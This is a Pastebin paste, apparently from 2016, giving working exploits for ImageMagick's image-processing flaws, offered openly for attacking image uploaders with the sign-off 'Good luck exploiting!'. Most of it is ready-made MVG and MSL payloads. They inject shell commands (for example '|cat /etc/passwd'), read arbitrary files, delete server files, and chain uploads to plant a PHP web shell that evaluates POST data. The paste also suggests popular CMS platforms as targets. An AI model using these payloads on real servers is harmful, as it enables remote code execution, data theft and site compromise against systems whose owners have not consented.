Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [+]======================================================================[+]
- [|] Exploiting ImageMagick [|]
- [|] By @DigitalGangster [|]
- [+]======================================================================[+]
- [|] What is it? [|]
- [+]======================================================================[+]
- [|] [|]
- [|] ImageMagick is a popular software used to convert, edit [|]
- [|] and manipulate images. It has libraries for all common [|]
- [|] programming languages, including PHP, Python, Ruby and [|]
- [|] many others. It is also very simple to use, which lead it [|]
- [|] to be used by many developers when in need of image [|]
- [|] cropping or manipulation. [|]
- [|] [|]
- [+]======================================================================[+]
- [|] Vulnerability [|]
- [+]======================================================================[+]
- [|] [|]
- [|] ImageMagick doesn’t properly filter the file names that [|]
- [|] get passed to the internal delegates that handle external [|]
- [|] protocols (ex. HTTPS)This allows an attacker to execute [|]
- [|] commands remotely by uploading an image. This leads to a [|]
- [|] full RCE vulnerability in your image uploader. [|]
- [|] [|]
- [+]======================================================================[+]
- [|] Exploit Code [|]
- [+]======================================================================[+]
- [|] Should work for all image files (.jpg/.mvg/.svg/.png/etc.) [|]
- [+] Exploit Image contents: [|]
- [|] [|]
- [|] push graphic-context [|]
- [|] viewbox 0 0 640 480 [|]
- [|] fill 'url(https://example.com/image.jpg "|YOUR COMMAND HERE")' [|]
- [|] [|]
- [+] Example Image: [|]
- [|] [|]
- [|] push graphic-context [|]
- [|] viewbox 0 0 640 480 [|]
- [|] fill 'url(https://example.com/image.jpg "|cat /etc/passwd")' [|]
- [|] pop graphic-context [|]
- [|] [|]
- [|] More examples: https://ghostbin.com/paste/vd3u5 [|]
- [+]======================================================================[+]
- [|] How to Exploit [|]
- [+]======================================================================[+]
- [|] [|]
- [|] 1. Find an Image uploader that uses ImageMagick to process images. [|]
- [|] (Try it @ http://attack32.samsclass.info/im.htm) [|]
- [|] 2. Craft a malicious image file [|]
- [|] 3. If it is running a vulnerable version, you'll have full RCE! [|]
- [|] [|]
- [|] Sometimes popular CMS' such as vBulletin, myBB, and WordPress [|]
- [|] implement ImageMagick to process user images! [|]
- [|] [|]
- [|] Good luck exploiting! [|]
- [|] -@DigitalGangster [|]
- [+]======================================================================[+]
- # Digital Gangster [2016-05-13]
- ImageMagick is vulnerable to a variety of attacks that allow reading, deleting,
- and writing files.
- Here are some useful trick to complement the fill 'url()' vulnerability
- described by @DigitalGangster
- == 1 ==
- It's possible to read arbitrary files from a web server by uploading an
- ImageMagick Vector Graphics file (MVG) that the web application processes with
- ImageMagick:
- push graphic-context
- viewbox 0 0 1024 1024
- image over 0,0 0,0 'label:@/etc/passwd'
- pop graphic-context
- As is the case with all of these vulnerabilities, the file doesn't need to be
- uploaded with a .mvg extension. You can change it to .png, .jpg, or anything
- else.
- If the file doesn't exist, you'll see the @ symbol plus the filename as the
- output.
- == 2 ==
- You can use a similar technique to delete a file, provided ImageMagick is built
- with support for it's ephemeral protocol:
- push graphic-context
- viewbox 0 0 1024 1024
- image over 0,0 0,0 'ephemeral:/var/www/index.php'
- pop graphic-context
- == 3 ==
- You can move files around, provided you're able to determine the location of
- uploaded files. This can be used to upload new files as well as overwrite
- existing files.
- first_image.png:
- <?xml version="1.0" encoding="UTF-8"?>
- <image>
- <read filename="/var/www/uploads/second_image.png"/>
- <write filename="/var/www/hi.php"/>
- </image>
- second_image.png:
- push graphic-context
- viewbox 0 0 1024 1024
- image over 0,0 0,0 'label:<?php if($_SERVER["REQUEST_METHOD"]=="POST")eval(file_get_contents("php://input")); ?>'
- pop graphic-context
- third_image.png:
- push graphic-context
- viewbox 0 0 1024 1024
- image over 0,0 0,0 'msl:/var/www/uploads/first_image.png'
- pop graphic-context
- # Digital Gangster [2016-05-16]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement